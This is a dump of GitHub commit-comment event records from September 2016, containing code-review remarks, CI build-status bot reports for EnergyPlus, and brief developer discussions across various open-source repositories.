{"id":"4511345648","type":"CommitCommentEvent","actor":{"login":"Shougo"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18888303,"position":null,"line":null,"path":null,"commit_id":"b3f4973b2543d8cc947203cc82c0122cd45c06c7","created_at":"2016-09-03T00:56:43Z","updated_at":"2016-09-03T00:56:43Z","body":"I think you should ask it in neovim-python issues."}},"created_at":"2016-09-03T00:56:43Z"}
{"id":"4511349511","type":"CommitCommentEvent","actor":{"login":"Shougo"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18888310,"position":null,"line":null,"path":null,"commit_id":"b3f4973b2543d8cc947203cc82c0122cd45c06c7","created_at":"2016-09-03T00:59:21Z","updated_at":"2016-09-03T00:59:21Z","body":"You can use gdb attach feature for it."}},"created_at":"2016-09-03T00:59:21Z"}
{"id":"4511350936","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888313,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T01:00:12Z","updated_at":"2016-09-03T01:00:12Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-03T01:00:12Z"}
{"id":"4511354640","type":"CommitCommentEvent","actor":{"login":"liweiok13579"},"repo":{"name":"liweiok/yt"},"payload":{"comment":{"id":18888318,"position":null,"line":null,"path":null,"commit_id":"f5511bdd7ab5add1cbdb8262f4302674cbaccbf3","created_at":"2016-09-03T01:02:23Z","updated_at":"2016-09-03T01:02:23Z","body":"sdfsdf"}},"created_at":"2016-09-03T01:02:23Z"}
{"id":"4511357231","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888323,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T01:04:07Z","updated_at":"2016-09-03T01:04:07Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-03T01:04:07Z"}
{"id":"4511361564","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18888335,"position":355,"line":1531,"path":"gpMgmt/bin/gppylib/operations/dump.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-03T01:07:07Z","updated_at":"2016-09-03T01:07:07Z","body":"why isn't this get_lines_from_csv_file?"}},"created_at":"2016-09-03T01:07:07Z"}
{"id":"4511361912","type":"CommitCommentEvent","actor":{"login":"zazazack"},"repo":{"name":"zazazack/zazazack.github.io"},"payload":{"comment":{"id":18888336,"position":17,"line":12,"path":"_includes/analytics.html","commit_id":"2a1460956bd30e8e9f1ef54a33daa15b45af75db","created_at":"2016-09-03T01:07:21Z","updated_at":"2016-09-03T01:07:21Z","body":"This stopped google analytics from working. How did this happen?"}},"created_at":"2016-09-03T01:07:21Z"}
{"id":"4511361987","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888338,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T01:07:23Z","updated_at":"2016-09-03T01:07:23Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-52.57%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-03T01:07:23Z"}
{"id":"4511366020","type":"CommitCommentEvent","actor":{"login":"MonicaYacue"},"repo":{"name":"sistemasinformacionts/Excercises1"},"payload":{"comment":{"id":18888344,"position":null,"line":null,"path":null,"commit_id":"dd86b0cbfc2c5f89d5e8b7a876a2533ba26629ad","created_at":"2016-09-03T01:10:13Z","updated_at":"2016-09-03T01:10:13Z","body":"Grupo 6 \r\nMonica Yacue Rivera"}},"created_at":"2016-09-03T01:10:13Z"}
{"id":"4511366893","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888345,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T01:10:47Z","updated_at":"2016-09-03T01:10:47Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-35.43%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-03T01:10:47Z"}
{"id":"4511366993","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"lefticus/decent_ci_runner"},"payload":{"comment":{"id":18888346,"position":null,"line":null,"path":null,"commit_id":"5b309297d156f65d21a9b3b6548353c717670534","created_at":"2016-09-03T01:10:52Z","updated_at":"2016-09-03T01:10:52Z","body":"@Myoldmopar With this commit we're ready for testing again"}},"created_at":"2016-09-03T01:10:52Z"}
{"id":"4511367984","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888347,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T01:11:34Z","updated_at":"2016-09-03T01:11:34Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-03T01:11:34Z"}
{"id":"4511369821","type":"CommitCommentEvent","actor":{"login":"stanHuaHub"},"repo":{"name":"stanHuaHub/GitHub"},"payload":{"comment":{"id":18888350,"position":null,"line":null,"path":null,"commit_id":"7f2af1445cb17d792c06c0278721000219875499","created_at":"2016-09-03T01:12:54Z","updated_at":"2016-09-03T01:12:54Z","body":"stan"}},"created_at":"2016-09-03T01:12:54Z"}
{"id":"4511370201","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18888353,"position":374,"line":1565,"path":"gpMgmt/bin/gppylib/operations/dump.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-03T01:13:10Z","updated_at":"2016-09-03T01:13:10Z","body":"add comments"}},"created_at":"2016-09-03T01:13:10Z"}
{"id":"4511370409","type":"CommitCommentEvent","actor":{"login":"shelleydoljack"},"repo":{"name":"sul-dlss/eloader-pkg-admin"},"payload":{"comment":{"id":18888354,"position":11,"line":17,"path":"db/seeds.rb","commit_id":"59be4b2c6630561e395211ad3ab977ea4ea2adee","created_at":"2016-09-03T01:13:19Z","updated_at":"2016-09-03T01:13:19Z","body":"The data pickup type should be constrained to a list of values."}},"created_at":"2016-09-03T01:13:19Z"}
{"id":"4511370772","type":"CommitCommentEvent","actor":{"login":"maryamklabib"},"repo":{"name":"quran/OneQuran"},"payload":{"comment":{"id":18888356,"position":null,"line":null,"path":null,"commit_id":"ceb674560ac48aa5ef31936eede1cbfdc50e09a7","created_at":"2016-09-03T01:13:35Z","updated_at":"2016-09-03T01:13:35Z","body":"beautiful tests"}},"created_at":"2016-09-03T01:13:35Z"}
{"id":"4511371125","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18888357,"position":363,"line":1538,"path":"gpMgmt/bin/gppylib/operations/dump.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-03T01:13:50Z","updated_at":"2016-09-03T01:13:50Z","body":"standardize all the else if conditions so that include_tables is always of the same list of tuples"}},"created_at":"2016-09-03T01:13:50Z"}
{"id":"4511382768","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18888385,"position":null,"line":null,"path":null,"commit_id":"b3f4973b2543d8cc947203cc82c0122cd45c06c7","created_at":"2016-09-03T01:21:21Z","updated_at":"2016-09-03T01:21:21Z","body":"> You can use gdb attach feature for it.\r\n\r\nBut that is quite different from pdb AFAIK, although there might be some gdb plugin/config to make it behave better?!\r\n\r\n> I think you should ask it in neovim-python issues.\r\n\r\nYes, it might/should be a feature of neovim-python probably.\r\n\r\n#337 was meant to ask for support of debugging #336 - I had no idea if it works etc.\r\n"}},"created_at":"2016-09-03T01:21:21Z"}
{"id":"4511390295","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"RyanTG/pbm-blog"},"payload":{"comment":{"id":18888395,"position":null,"line":null,"path":null,"commit_id":"70187229d896b818c2d427b133dafa1d39f7b237","created_at":"2016-09-03T01:26:54Z","updated_at":"2016-09-03T01:26:54Z","body":"@scottwainstock I restyled the blog to match the new site style. But I'll hold off on the pull request until everything is ready."}},"created_at":"2016-09-03T01:26:54Z"}
{"id":"4511390948","type":"CommitCommentEvent","actor":{"login":"ryon"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18888398,"position":null,"line":null,"path":null,"commit_id":"71d0ac1f50365993d0a452aaf0b3b3d46fffcacf","created_at":"2016-09-03T01:27:25Z","updated_at":"2016-09-03T01:27:25Z","body":"Sorry, meant to PR this in a branch, got some wires crossed"}},"created_at":"2016-09-03T01:27:25Z"}
{"id":"4511394799","type":"CommitCommentEvent","actor":{"login":"lineuman"},"repo":{"name":"lineuman/fabric"},"payload":{"comment":{"id":18888401,"position":null,"line":null,"path":null,"commit_id":"05022bd5049c7459376eba0aaf339d4dca8b429a","created_at":"2016-09-03T01:30:16Z","updated_at":"2016-09-03T01:30:16Z","body":"good,i need to parse /etc/ssh/sshd_config"}},"created_at":"2016-09-03T01:30:16Z"}
{"id":"4511395079","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18888402,"position":31,"line":46,"path":"subprojects/launcher/src/main/java/org/gradle/launcher/daemon/server/health/MemoryInfo.java","commit_id":"4b003df40c373c85ebc715d65c12ad92a1f07ff7","created_at":"2016-09-03T01:30:28Z","updated_at":"2016-09-03T01:30:28Z","body":"I fixed this on release. Thank you "}},"created_at":"2016-09-03T01:30:28Z"}
{"id":"4511398930","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18888407,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-03T01:33:21Z","updated_at":"2016-09-03T01:33:21Z","body":"Commit not needed. Google fixed the issue in N."}},"created_at":"2016-09-03T01:33:21Z"}
{"id":"4511400350","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"AOSIP/platform_packages_apps_Settings"},"payload":{"comment":{"id":18888409,"position":null,"line":null,"path":null,"commit_id":"902b1e64ac93abf80399e98ead9d63e9111b1779","created_at":"2016-09-03T01:34:24Z","updated_at":"2016-09-03T01:34:24Z","body":"Commit not needed. Google fixed the issue in N."}},"created_at":"2016-09-03T01:34:24Z"}
{"id":"4511402973","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18888416,"position":19,"line":116,"path":"netbox/src/core/SessionData.cpp","commit_id":"ba463ba2134b5d473aa1506a71cbaf5e4f0a641e","created_at":"2016-09-03T01:36:17Z","updated_at":"2016-09-03T01:36:17Z","body":"WHY? Why do you replace setters with your assignments?! How does this 'fixes valgrind' errors?"}},"created_at":"2016-09-03T01:36:17Z"}
{"id":"4511403032","type":"CommitCommentEvent","actor":{"login":"xlxfoxxlx"},"repo":{"name":"AOSIP/platform_packages_apps_Settings"},"payload":{"comment":{"id":18888417,"position":null,"line":null,"path":null,"commit_id":"902b1e64ac93abf80399e98ead9d63e9111b1779","created_at":"2016-09-03T01:36:19Z","updated_at":"2016-09-03T01:36:19Z","body":"yea no shit beans already made sure to point it out and i already noticed this before"}},"created_at":"2016-09-03T01:36:19Z"}
{"id":"4511403998","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18888420,"position":5,"line":75,"path":"colorer/src/pcolorer2/FarHrcSettings.cpp","commit_id":"ba463ba2134b5d473aa1506a71cbaf5e4f0a641e","created_at":"2016-09-03T01:37:02Z","updated_at":"2016-09-03T01:37:02Z","body":"use nullptr..."}},"created_at":"2016-09-03T01:37:02Z"}
{"id":"4511404574","type":"CommitCommentEvent","actor":{"login":"nfq6612"},"repo":{"name":"tangkai/android"},"payload":{"comment":{"id":18888422,"position":null,"line":null,"path":null,"commit_id":"7a4a5a6f4c0bddc00e92e9bf0ef041ad8a48c471","created_at":"2016-09-03T01:37:27Z","updated_at":"2016-09-03T01:37:27Z","body":"ddd"}},"created_at":"2016-09-03T01:37:27Z"}
{"id":"4511405466","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18888424,"position":180,"line":227,"path":"netbox/src/core/SessionData.cpp","commit_id":"ba463ba2134b5d473aa1506a71cbaf5e4f0a641e","created_at":"2016-09-03T01:38:10Z","updated_at":"2016-09-03T01:38:10Z","body":"Again, what was the point of this?"}},"created_at":"2016-09-03T01:38:10Z"}
{"id":"4511406631","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888429,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-03T01:39:08Z","updated_at":"2016-09-03T01:39:08Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1761 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-03T01:39:08Z"}
{"id":"4511409583","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"lefticus/decent_ci_runner"},"payload":{"comment":{"id":18888435,"position":null,"line":null,"path":null,"commit_id":"5b309297d156f65d21a9b3b6548353c717670534","created_at":"2016-09-03T01:41:24Z","updated_at":"2016-09-03T01:41:24Z","body":"@Myoldmopar nevermind, more to do still"}},"created_at":"2016-09-03T01:41:24Z"}
{"id":"4511411618","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18888439,"position":null,"line":null,"path":null,"commit_id":"f386c1c813f0bbdb9ae36d5c45a6f51e72b9f75d","created_at":"2016-09-03T01:42:56Z","updated_at":"2016-09-03T01:42:56Z","body":"++"}},"created_at":"2016-09-03T01:42:56Z"}
{"id":"4511416190","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":18888450,"position":null,"line":null,"path":null,"commit_id":"f2df5d05abf530f6cccee8d89eba484be956f93f","created_at":"2016-09-03T01:46:25Z","updated_at":"2016-09-03T01:46:25Z","body":"Commit not needed. Google fixed the issue in N."}},"created_at":"2016-09-03T01:46:25Z"}
{"id":"4511419305","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":18888454,"position":null,"line":null,"path":null,"commit_id":"f2df5d05abf530f6cccee8d89eba484be956f93f","created_at":"2016-09-03T01:48:51Z","updated_at":"2016-09-03T01:48:51Z","body":"You're right @shawnwahi, slight oversight on our part. Thank you"}},"created_at":"2016-09-03T01:48:51Z"}
{"id":"4511419322","type":"CommitCommentEvent","actor":{"login":"kentonv"},"repo":{"name":"sandstorm-io/sandstorm"},"payload":{"comment":{"id":18888455,"position":274,"line":643,"path":"shell/client/styles/_account.scss","commit_id":"87de090c061608167336dfa7bb5a89bfb2df8369","created_at":"2016-09-03T01:48:52Z","updated_at":"2016-09-03T01:48:52Z","body":"You seem to have changed the two sub-sections of \"billing\" such that they stack vertically even when there is plenty of horizontal space. Was this intentional? It looks bad to me. It's hard to see where \"My Plan\" ends and \"Payment Methods\" begins -- they kind of blend together."}},"created_at":"2016-09-03T01:48:52Z"}
{"id":"4511420597","type":"CommitCommentEvent","actor":{"login":"JustinAiken"},"repo":{"name":"poteto/elixirconf-2016"},"payload":{"comment":{"id":18888456,"position":null,"line":null,"path":null,"commit_id":"dbed9d99c632fe52f1c14fafcc6df304d6156f1a","created_at":"2016-09-03T01:49:57Z","updated_at":"2016-09-03T01:49:57Z","body":"Thanks! :)"}},"created_at":"2016-09-03T01:49:57Z"}
{"id":"4511423934","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888459,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-03T01:52:42Z","updated_at":"2016-09-03T01:52:42Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-03T01:52:42Z"}
{"id":"4511425439","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":18888460,"position":null,"line":null,"path":null,"commit_id":"f2df5d05abf530f6cccee8d89eba484be956f93f","created_at":"2016-09-03T01:53:55Z","updated_at":"2016-09-03T01:53:55Z","body":"Np...credits to @beanstown106 for the find. I simply passed it on :)"}},"created_at":"2016-09-03T01:53:55Z"}
{"id":"4511427549","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18888466,"position":null,"line":null,"path":null,"commit_id":"97564c84320e418cdd1d531726b71fbcaa8e70a3","created_at":"2016-09-03T01:55:41Z","updated_at":"2016-09-03T01:55:41Z","body":"Bug still use there...\r\n\r\n@mfonville "}},"created_at":"2016-09-03T01:55:41Z"}
{"id":"4511428071","type":"CommitCommentEvent","actor":{"login":"kentonv"},"repo":{"name":"sandstorm-io/sandstorm"},"payload":{"comment":{"id":18888468,"position":4,"line":13,"path":"shell/client/styles/_geometry.scss","commit_id":"87de090c061608167336dfa7bb5a89bfb2df8369","created_at":"2016-09-03T01:56:05Z","updated_at":"2016-09-03T01:56:05Z","body":"It looks like the desktop account settings page overflows at 700px or so, so there's a horizontal scroll between 600px and 700px. Should we set the breakpoint to 700px instead?"}},"created_at":"2016-09-03T01:56:05Z"}
{"id":"4511936419","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889654,"position":162,"line":409,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T10:00:15Z","updated_at":"2016-09-03T10:00:15Z","body":"rebuild is a verb, rebuilt is a noun?"}},"created_at":"2016-09-03T10:00:15Z"}
{"id":"4511937514","type":"CommitCommentEvent","actor":{"login":"GremlynJP"},"repo":{"name":"GremlynJP/PythonGP"},"payload":{"comment":{"id":18889660,"position":null,"line":null,"path":null,"commit_id":"2c3febde76cafe54fd1eb79e153cbec71278b216","created_at":"2016-09-03T10:01:03Z","updated_at":"2016-09-03T10:01:03Z","body":"Just add a encode rule statement"}},"created_at":"2016-09-03T10:01:03Z"}
{"id":"4511939577","type":"CommitCommentEvent","actor":{"login":"tvdeyen"},"repo":{"name":"AlchemyCMS/alchemy_cms"},"payload":{"comment":{"id":18889663,"position":10,"line":null,"path":"config/initializers/dragonfly.rb","commit_id":"48de6047968e7f3d47fb640e348a005ae072d711","created_at":"2016-09-03T10:02:47Z","updated_at":"2016-09-03T10:02:47Z","body":"I encountered a problem where requests for images with `%20` (space) in file name causes the request to always hit the server not the cached file. This was in local rails server, maybe not a problem on real servers. But we should consider to replace them with real spaces? I will investigate "}},"created_at":"2016-09-03T10:02:47Z"}
{"id":"4511940265","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889664,"position":208,"line":555,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T10:03:25Z","updated_at":"2016-09-03T10:03:25Z","body":"Symmetry axis. Axis of symmetry."}},"created_at":"2016-09-03T10:03:25Z"}
{"id":"4511940967","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"Hacker432-Y550/android_device_huawei_y550"},"payload":{"comment":{"id":18889665,"position":null,"line":null,"path":null,"commit_id":"19846ebe91502a38c6b24c8659d1a770bb6bebb4","created_at":"2016-09-03T10:04:01Z","updated_at":"2016-09-03T10:04:01Z","body":"you can do better following commit from cherry.\r\nfrom here : https://github.com/CyanogenMod/android_device_huawei_msm8916-common/commit/3abff94c9b176efe95fdb8cefbc43c9d09b6eef3\r\nto\r\nhttps://github.com/CyanogenMod/android_device_huawei_msm8916-common/commit/f5eb00042db14708c2a3b16b46bad22cfa4fd278\r\nsome change needed in vendors too.\r\nLet me know if all is good."}},"created_at":"2016-09-03T10:04:01Z"}
{"id":"4511941149","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889666,"position":null,"line":null,"path":null,"commit_id":"ccff463cf970800f3dae555e6fd3a0b673ef9e58","created_at":"2016-09-03T10:04:12Z","updated_at":"2016-09-03T10:04:12Z","body":":+1: \r\nIam busy with the backport now i'll get back to it when i'll finish them :)\r\na fast description is\r\nACTION_T_SET_REACT_STATE: (50)\r\naction param1 = 0, 1, 2\r\n0 = REACT_PASSIVE\r\n1 = REACT_DEFENSIVE\r\n2 = REACT_AGRESSIVE"}},"created_at":"2016-09-03T10:04:12Z"}
{"id":"4511942058","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889669,"position":5,"line":6,"path":"Part_II_Theory/2C._evaluation_of_rotation_matrix_elements_by_recurrence.tex","commit_id":"b54ad6c47bfc19d5b17434f498b376e3f6da5923","created_at":"2016-09-03T10:05:02Z","updated_at":"2016-09-03T10:05:02Z","body":"there are several similar definitions"}},"created_at":"2016-09-03T10:05:02Z"}
{"id":"4511942194","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889670,"position":null,"line":null,"path":null,"commit_id":"b7e7a133cd06a637698b08c680e3bbd0882d9c6d","created_at":"2016-09-03T10:05:10Z","updated_at":"2016-09-03T10:05:10Z","body":"Thank you"}},"created_at":"2016-09-03T10:05:10Z"}
{"id":"4511943860","type":"CommitCommentEvent","actor":{"login":"shell-echo"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18889674,"position":null,"line":null,"path":null,"commit_id":"95d6b9f39eb33acac1e0b0efa4f1eb1df8a001ee","created_at":"2016-09-03T10:06:41Z","updated_at":"2016-09-03T10:06:41Z","body":"@janbartel i created a simple web project and copied the war file to $JETTY_HOME/webapps, then i started  jetty with command `java -jar start.jar -Djetty.deploy.extractWars=false`, the problem happened again.\r\nMy test jetty version is jetty-distribution-9.3.11.v20160721.\r\nThe source is as attached.\r\n[jetty.zip](https://github.com/eclipse/jetty.project/files/453290/jetty.zip)\r\n"}},"created_at":"2016-09-03T10:06:41Z"}
{"id":"4511943930","type":"CommitCommentEvent","actor":{"login":"BaumSchorle"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18889675,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-03T10:06:45Z","updated_at":"2016-09-03T10:06:45Z","body":"I am fine with that :)"}},"created_at":"2016-09-03T10:06:45Z"}
{"id":"4511944549","type":"CommitCommentEvent","actor":{"login":"sachinbidwai123"},"repo":{"name":"sachinbidwai123/Hello-World1"},"payload":{"comment":{"id":18889676,"position":null,"line":null,"path":null,"commit_id":"74525e5246df983dab5a5e70469cc58cdde575d8","created_at":"2016-09-03T10:07:18Z","updated_at":"2016-09-03T10:07:18Z","body":"sdfgsdfg"}},"created_at":"2016-09-03T10:07:18Z"}
{"id":"4511944862","type":"CommitCommentEvent","actor":{"login":"rycee"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889677,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T10:07:39Z","updated_at":"2016-09-03T10:07:39Z","body":"I'm not sure, does `freeciv-sdl` use OpenGL? From the [SDL build](https://hydra.nixos.org/build/39825836/log#line-355):\r\n```\r\nchecking for OpenGL (GLX) support... no\r\n```"}},"created_at":"2016-09-03T10:07:39Z"}
{"id":"4511945945","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889679,"position":81,"line":135,"path":"Part_II_Theory/2C._evaluation_of_rotation_matrix_elements_by_recurrence.tex","commit_id":"b54ad6c47bfc19d5b17434f498b376e3f6da5923","created_at":"2016-09-03T10:08:38Z","updated_at":"2016-09-03T10:08:38Z","body":"+ or -, there are two conditions"}},"created_at":"2016-09-03T10:08:38Z"}
